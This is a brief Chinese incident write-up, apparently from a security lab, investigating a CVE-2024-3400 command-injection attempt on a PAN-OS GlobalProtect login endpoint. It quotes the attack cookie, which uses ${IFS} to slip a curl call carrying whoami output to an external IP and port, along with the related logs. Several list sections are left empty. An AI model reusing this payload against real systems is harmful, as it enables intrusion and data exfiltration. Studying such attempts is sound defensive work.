本项目记录了对针对 PAN-OS GlobalProtect 服务的 CVE-2024-3400 命令注入攻击尝试 的调查过程。
目标在于确定:
触发了一条关键警报,表明可能存在利用尝试。

请求包含一个精心构造的 cookie:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} 绕过空格过滤whoami 尝试获取系统身份curl 尝试出站通信这是一个 命令注入载荷
Nginx 日志确认请求已到达服务器:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

恶意请求已被接受并处理。
系统日志显示载荷已进入内部逻辑:

dt_curl)然而:
DNS 查询失败 → 出站失败
攻击 IP:

这确认了攻击者来自外部。
在攻击之前,多个 IP 与系统进行了交互:

只有 144.172.79.92 直接与漏洞利用相关。
这是一次 真实的命令注入攻击尝试。
攻击者成功:
然而:
未确认执行或系统受损
命令注入尝试
载荷已处理 - 未确认执行或影响